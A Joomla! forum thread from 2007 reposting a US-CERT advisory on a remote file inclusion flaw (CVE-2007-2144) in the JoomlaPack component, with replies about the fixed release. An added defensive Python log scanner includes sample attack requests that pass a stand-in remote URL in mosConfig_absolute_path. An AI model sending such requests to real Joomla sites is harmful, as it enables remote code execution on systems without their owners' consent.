The Joomla! Forum ™





 Post subject: com_jpack 1.0.4a2
Posted: Wed Apr 25, 2007 5:42 am
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
Original release date:  4/19/2007
Last revised: 4/19/2007
Source: US-CERT/NIST

Overview
PHP remote file inclusion vulnerability in includes/CAltInstaller.php in the JoomlaPack (com_jpack) 1.0.4a2 RE component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.


Impact
CVSS Severity: 7.0 (High)
Range: Remotely exploitable
Authentication: Not required to exploit
Impact Type: Provides unauthorized access, Allows partial confidentiality, integrity, and availability violation


References to Advisories, Solutions, and Tools

External Source: MILW0RM

Name: 3753

Hyperlink: http://www.milw0rm.com/exploits/3753


External Source: FRSIRT

Name: ADV-2007-1429

Type:  Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2007/1429


Vulnerable software and versions
JoomlaPack, JoomlaPack, 1.0.4a2 RE


Technical Details
CVSS Base Score Vector: (AV:R/AC:L/Au:NR/C:P/I:P/A:P/B:N)

Vulnerability Type: Input Validation Error


CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cg ... -2007-2144


Common Platform Enumeration:
http://nvd.nist.gov/cpe.cfm?cvename=CVE-2007-2144

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org
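
A defender's check for the request pattern the advisory above describes, as an added example that is not part of the original posts or of JoomlaPack: it flags access-log entries where includes/CAltInstaller.php receives a URL in mosConfig_absolute_path. The combined log format, the component's install path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "includes/caltinstaller.php"   # script named in the advisory
PARAM = "mosConfig_absolute_path"       # parameter named in the advisory
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # a URL, not a local path
# Assumption: access log in Apache/nginx "combined" format.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def decode(value, rounds=3):
    """Undo extra layers of percent-encoding (parse_qsl removes only one)."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def check_line(line):
    """Return a finding dict if the request passes a URL in PARAM to SCRIPT."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not decode(target.path).lower().endswith(SCRIPT):
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = decode(value)
        if name == PARAM and URL_VALUE.match(value):
            return {"ip": m["ip"], "time": m["ts"],
                    "status": int(m["status"]), "value": value}
    return None

def scan(lines):
    return [hit for hit in map(check_line, lines) if hit]

# Constructed sample lines (documentation addresses, .invalid hosts, assumed path).
BASE = "/administrator/components/com_jpack/includes/CAltInstaller.php"
SAMPLE = [
    f'203.0.113.7 - - [20/Apr/2007:10:12:01 +0000] "GET {BASE}?{PARAM}=http://files.example.invalid/a.txt HTTP/1.1" 200 512',
    f'203.0.113.9 - - [20/Apr/2007:10:13:44 +0000] "GET {BASE}?{PARAM}=http%253A%252F%252Ffiles.example.invalid%252Fa.txt HTTP/1.1" 404 210',
    f'198.51.100.4 - - [20/Apr/2007:10:15:02 +0000] "GET {BASE}?{PARAM}=/var/www/site HTTP/1.1" 200 90',
    '198.51.100.4 - - [20/Apr/2007:10:16:30 +0000] "GET /index.php?option=com_jpack HTTP/1.1" 200 4021',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Access logs record only the query string, so a value sent in a POST body will not appear here. A hit with status 200 means the script was reachable and the host deserves closer review.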


 
 Post subject: Re: com_jpack 1.0.4a2
Posted: Thu Apr 26, 2007 8:18 am
Joomla! Master

Joined: Thu Aug 18, 2005 9:58 am
Posts: 10117
Location: Hillerød - Denmark
Developer notified and they will produce a new security audited release within the next days.

_________________
Ole Bang Ottosen
redCOMPONENT Community Manager http://redcomponent.com
Personligt site www.ot2sen.dk
Dansk Joomla! support websted - joomla.dk


 
 Post subject: Re: com_jpack 1.0.4a2
Posted: Wed May 09, 2007 4:45 pm
Joomla! Guru

Joined: Sun Nov 20, 2005 7:04 pm
Posts: 723
Location: Germany
@ot2sen

Any news on the status of this component?

Alex ...

_________________
| http://www.zeitfokus.de |


 
 Post subject: Re: com_jpack 1.0.4a2
Posted: Sat May 12, 2007 9:56 pm
Joomla! Enthusiast

Joined: Thu Apr 06, 2006 3:42 pm
Posts: 105
Location: Leeuwarden
I have just found version 1.0.4a3.
I do not know if this already includes an update for this security fix.

His website is at http://sledge81.freehostia.com/ with a lot of good info.

This version does have more functions and looks good :-*

_________________
Qua Patet Orbis http://www.coconutswebdesign.nl http://www.coconutshosting.nl


Last edited by schipperijn on Sat May 12, 2007 10:16 pm, edited 1 time in total.

 
 Post subject: Re: com_jpack 1.0.4a2
Posted: Tue Jun 05, 2007 8:06 am
Joomla! Master

Joined: Thu Aug 18, 2005 9:58 am
Posts: 10117
Location: Hillerød - Denmark
alexhokamp wrote:
@ot2sen

Any news on the status of this component?

Developer just confirmed that a new release 1.0.4-b1 is ready for download.
Extension republished at Joomla! Extensions Directory:
http://extensions.joomla.org/component/ ... Itemid,35/

_________________
Ole Bang Ottosen
redCOMPONENT Community Manager http://redcomponent.com
Personligt site www.ot2sen.dk
Dansk Joomla! support websted - joomla.dk

